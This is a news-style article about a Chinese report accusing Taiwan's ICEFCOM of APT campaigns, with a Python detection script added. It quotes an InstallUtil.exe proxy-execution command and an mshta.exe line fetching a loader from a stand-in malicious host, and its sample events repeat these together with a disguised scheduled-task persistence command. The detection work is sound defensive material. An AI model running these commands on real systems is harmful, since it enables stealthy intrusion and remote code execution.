Chinese cybersecurity agencies, backed by leading research labs and security firms, have publicly accused Taiwan’s Information, Communications and Electronic Force Command (ICEFCOM), allegedly supported by the United States, of orchestrating a multi-year campaign of Advanced Persistent Threat (APT) attacks targeting critical infrastructure and sensitive entities across mainland China, Hong Kong, and Macao.
The investigation, released today by the National Computer Virus Emergency Response Center and 360 Digital Security Group, details an extensive web of cyber espionage operations attributed to so-called “T-APTs” hacker groups said to be acting on behalf of Taiwan’s Democratic Progressive Party (DPP) and under ICEFCOM’s direction.
Technical Operation Tactics: Sophisticated, Yet Reliant on Known Vulnerabilities
Attack Chain and Notable Tools
The report singles out five major APT groups — APT-C-01 (“Poison Vine”), APT-C-62 (“Viola Tricolor”), APT-C-64 (“Anonymous 64”), APT-C-65 (“Neon Pothos”), and APT-C-67 (“Ursa”) — as core threat actors. Each group purportedly specializes in targeting different sectors via a range of tactics, techniques, and procedures (TTPs). The hallmarks of their operations include:
- Reconnaissance: Use of platforms like Shodan and Censys to map assets and gather target data.
- Initial Access: Lure documents, phishing emails, and phishing websites modeled after legitimate industry or government portals, with attachments containing malicious code. Example file types: .docx, .pdf, .rtf, .lnk.
- Exploitation: Predominantly leveraging known vulnerabilities in Microsoft Windows, Office suites, OA (office automation) systems, CRM, and VSS.
- Persistence: Establishing footholds via Windows scheduled tasks, startup folders, and registry entries.
- Lateral Movement: Use of open-source and commercial tools, including credential dumpers (pwdump8, MirrorDump, POSTDump, Procdump) and the Fscan network scanner, to extract credentials and reach further hosts.
- Defense Evasion: Employing InstallUtil.exe, a signed Microsoft .NET utility, to proxy execution of payloads and avoid detection.
- Command and Control (C2): Deployment of well-known malware such as Cobalt Strike, QuasarRAT, Sliver, and legitimate admin tools like GotoHTTP for remote operations and data exfiltration.
A representative command line from the report shows how InstallUtil.exe is abused for stealthy execution:

```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\Bypass.exe
```

The /U switch makes InstallUtil call the Uninstall() method of any installer class in the target assembly, so the attacker's code runs under a trusted Microsoft binary; the empty /logfile= value and /LogToConsole=false suppress the log output that would otherwise record the run.
Such tactics blend legitimate system operations with malicious intent, making detection challenging.
Examples of Malware in Use
- QuasarRAT: Open-source remote access Trojan with features like keylogging, screen capture, and file management. Deobfuscated samples revealed embedded C2 server addresses, encrypted using AES.
- Sliver RAT: Cross-platform C2 framework, dropped and decrypted in memory via a multistage process involving downloaded AES-encrypted shellcode.
- Stager Payloads: Compact first-stage code (sometimes ≤1,000 bytes) delivered after successful exploitation, which connects back to attacker C2 servers over HTTPS or raw TCP to fetch the full secondary payload.
The joint investigation notes that while the attackers demonstrate planning and technical proficiency, their toolkit heavily relies on public, open-source software and widely known exploits rather than zero-day vulnerabilities. Incident responses often revealed tell-tale signs of operational sloppiness, such as obvious language traces and re-used phishing templates.
Case Study: Phishing and Lateral Movement
A typical attack progression:
- The victim receives a targeted spear-phishing email with an attached .lnk file masquerading as a PDF.
- The .lnk triggers execution of a remote HTA file via mshta.exe, downloading a loader:

```
mshta.exe http://malicious-site.com/loader.hta
```

- The loader fetches and runs a backdoor (e.g., QuasarRAT or Cobalt Strike Beacon) and schedules persistence with a fake system task.
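As an added example (not code from the report or from this page), the following detection logic covers the InstallUtil.exe proxy execution from the TTP list and the mshta.exe remote HTA download and fake-system-task persistence from the case study above. It runs over constructed process-creation events shaped like the Image, CommandLine and ParentImage fields of Sysmon Event ID 1; the suspicious-directory lists, the severity heuristic, the task name and the benign look-alike events are assumptions made for the illustration.

```python
"""Detection rules for the LOLBin and persistence TTPs described on this page,
run over constructed (not real) process-creation events."""
import re
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 / Security 4688 fields)."""
    image: str
    command_line: str
    parent_image: str


# Assumed user-writable drop locations; a genuine InstallUtil target or
# scheduled-task action almost never lives here.
SUSPICIOUS_DIRS = (r"c:\windows\tasks", r"c:\windows\temp", r"c:\programdata",
                   r"c:\users\public", r"\appdata\local\temp")
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files")
# A double-clicked .lnk runs under explorer.exe; Office parents cover macro lures.
USER_FACING_PARENTS = ("explorer.exe", "winword.exe", "excel.exe", "outlook.exe")
REMOTE_CONTENT = re.compile(r"(https?://\S+|\\\\\S+|javascript:|vbscript:)", re.I)


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _tokens(cmdline: str) -> List[str]:
    """Split a command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def _opt_value(args: List[str], flag: str) -> Optional[str]:
    """Value following a schtasks-style switch such as /tn or /tr."""
    low = [a.lower() for a in args]
    if flag in low and low.index(flag) + 1 < len(args):
        return args[low.index(flag) + 1]
    return None


def _in_suspicious_dir(path: str) -> bool:
    return any(d in path.lower() for d in SUSPICIOUS_DIRS)


def rule_installutil_uninstall(ev: ProcEvent) -> Optional[str]:
    """InstallUtil.exe /U runs the target's Uninstall() method under a signed
    Microsoft binary; alert only when the target sits in a user-writable path,
    because /U alone is also how legitimate services are uninstalled."""
    if _base(ev.image) != "installutil.exe":
        return None
    args = _tokens(ev.command_line)
    if not any(a.lower() == "/u" for a in args):
        return None
    for target in (a for a in args[1:] if a.lower().endswith((".exe", ".dll"))):
        if _in_suspicious_dir(target):
            note = " (logging suppressed)" if any(a.lower() == "/logfile=" for a in args) else ""
            return f"InstallUtil.exe /U executing {target!r} from a user-writable directory{note}"
    return None


def rule_mshta_remote(ev: ProcEvent) -> Optional[str]:
    """mshta.exe fetching an HTA over HTTP/UNC or running inline script."""
    if _base(ev.image) != "mshta.exe":
        return None
    m = REMOTE_CONTENT.search(ev.command_line)
    if not m:
        return None
    parent = _base(ev.parent_image)
    sev = "HIGH" if parent in USER_FACING_PARENTS else "MEDIUM"
    return f"{sev}: mshta.exe loading {m.group(1)} (parent {parent})"


def rule_schtasks_persistence(ev: ProcEvent) -> Optional[str]:
    """schtasks /create whose action is in a user-writable directory, or whose
    name imitates a built-in \\Microsoft\\Windows task while running elsewhere."""
    if _base(ev.image) != "schtasks.exe":
        return None
    args = _tokens(ev.command_line)
    if "/create" not in [a.lower() for a in args]:
        return None
    tn, tr = _opt_value(args, "/tn"), _opt_value(args, "/tr")
    reasons = []
    if tr and _in_suspicious_dir(tr):
        reasons.append(f"action {tr!r} is in a user-writable directory")
    if tn and tr and tn.lower().startswith("\\microsoft\\windows\\") \
            and not tr.lower().startswith(SYSTEM_DIRS):
        reasons.append(f"task name {tn!r} imitates a built-in task but runs outside system directories")
    return "; ".join(reasons) if reasons else None


RULES: List[Tuple[str, Callable[[ProcEvent], Optional[str]]]] = [
    ("installutil_uninstall", rule_installutil_uninstall),
    ("mshta_remote", rule_mshta_remote),
    ("schtasks_persistence", rule_schtasks_persistence),
]


def run_rules(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Apply every rule to every event; return (rule name, message) per hit."""
    return [(name, msg) for ev in events for name, rule in RULES if (msg := rule(ev))]


# Constructed sample events (not from the report): events 2-4 reproduce the
# page's behaviours, events 1, 5 and 6 are benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
              r'InstallUtil.exe /u "C:\Program Files\Vendor\VendorService.exe"',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
              r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "
              r"/logfile= /LogToConsole=false /U C:\Windows\Tasks\Bypass.exe",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", "mshta.exe http://malicious-site.com/loader.hta",
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /sc minute /mo 30 /tn "\Microsoft\Windows\UpdateOrchestrator\UpdateCheck" '
              r'/tr "C:\Users\Public\svchost.exe" /f', r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /sc daily /tn "VendorBackup" /tr "C:\Program Files\Vendor\backup.exe"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\notepad.exe", "notepad.exe report.txt", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for name, msg in run_rules(SAMPLE_EVENTS):
        print(f"[{name}] {msg}")
```

The path heuristic, not the switch, drives the InstallUtil alert: /U against an assembly under Program Files is what a normal service uninstall looks like, and alerting on the switch alone would drown the real hits. The same applies to schtasks /create, which every installer runs; the signal is an action in a user-writable directory or a task name borrowed from the \Microsoft\Windows tree. For mshta.exe, the parent process is what separates a double-clicked .lnk from an administrator's script, which is why the rule raises the severity when explorer.exe or an Office application is the parent.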
Attribution and Geopolitical Ramifications
ICEFCOM’s Structure and “Foreign Collusion” Allegations
Analysts identified ICEFCOM, Taiwan's military-linked cyber command, as the organizational hub for these activities, with over 6,000 personnel and roots in U.S. cyber doctrine. The report alleges a close operational link to U.S. Cyber Command, especially since the high-profile arms deals and joint defense forums of 2024.
Profiled leaders, including Commander Jian Hua-ching and Deputy Commander Wang Yue-yang, were named with detailed backgrounds as a warning of further "tracking and exposure." The mainland's agencies vow to escalate countermeasures and pursue international legal action.
Technical Assessment
Despite the breadth of the campaign, the assessment labels the threat groups as technically second-tier, citing:
- Reliance on known vulnerabilities and scarce use of zero-day exploits.
- Overdependence on free/open-source malware.
- Weak anti-forensics and error-prone phishing campaigns, rendering many operations attributable.
While China’s technical attribution of the cyberattacks to Taiwan’s ICEFCOM and, by extension, the United States, constitutes one of the most detailed accusations to date, the debate over the true scope and direction of these APT groups is likely to escalate.
The exposure of TTPs and malware hashes, alongside calls for international cooperation against “foreign cyber subversion,” marks a new chapter in both cyber-warfare and cross-Strait tensions.
Whether these claims lead to diplomatic fallout, technical countermeasures, or new cybersecurity doctrines, one thing is clear: the cyber battlefield across the Taiwan Strait is rapidly evolving.